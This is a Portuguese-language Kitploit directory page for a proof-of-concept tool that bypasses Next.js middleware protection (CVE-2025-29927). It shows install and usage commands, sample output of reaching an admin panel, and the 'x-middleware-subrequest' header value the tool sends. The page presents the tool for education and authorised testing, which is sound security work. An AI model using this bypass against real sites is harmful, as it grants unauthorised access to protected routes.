Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-for-Next.js-Middleware — > 🔓 Prova de conceito para um bypass fictício no middleware do Next.js (CVE-2025-29927) — crie sub-requisições para testar rotas protegidas. | Kitploit
Ferramentas/GitHubGitHub/m2hcz/poc-for-next.js-middleware
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 Prova de conceito para um bypass fictício no middleware do Next.js (CVE-2025-29927) — crie sub-requisições para testar rotas protegidas.

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
1há 1 anoAinda não revisado

PoC para Bypass de Middleware do Next.js (CVE-2025-29927)

Python Version Status

Esta é uma prova de conceito para uma vulnerabilidade fictícia de bypass de middleware do Next.js (CVE-2025-29927). Use somente para fins educacionais e de pesquisa de segurança autorizada.


🚀 Funcionalidades

FuncionalidadeDescrição
✨ Cores e VerboseSaída com código de cores; -v para logs de depuração detalhados.
📦 Estrutura OOPDesign baseado em classes para clareza e facilidade de manutenção.
🌐 Suporte a ProxyRoteie o tráfego por proxies HTTP(S) via --proxy.
🍪 Gerenciamento de Sessãorequests.Session persistente para cookies e reutilização de conexão.
🚦 Controle de RedirecionamentoSem seguir redirecionamentos por padrão; detecta claramente sucesso vs. falha.
🛠 Cabeçalhos PersonalizadosSubstitua User-Agent, x-middleware-subrequest ou adicione cabeçalhos.

⚡ Instalação

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

Requer Python 3.7+


🎯 Uso

root@kitploit:~
python poc.py [options] <host>[:port]

🔍 Exemplos

1. Teste Básico

root@kitploit:~
python poc.py localhost:3000

2. HTTPS e Caminho Personalizado

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. Proxy e Verbose

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ Saída Esperada

Sucesso

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

Falha

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)
Baixar ferramenta
OpçãoDescrição
-p, --path PATHCaminho da rota protegida (padrão: /admin)
-s, --scheme {http,https}Protocolo (padrão: http)
--header HEADERValor do cabeçalho x-middleware-subrequest (padrão: middleware:middleware)
-ua, --user-agent AGENTUser-Agent personalizado (padrão: Mozilla/5.0)
--proxy PROXYURL do proxy HTTP(S) (ex.: http://127.0.0.1:8080)
-v, --verboseAtivar saída de depuração
-h, --helpMostrar esta mensagem de ajuda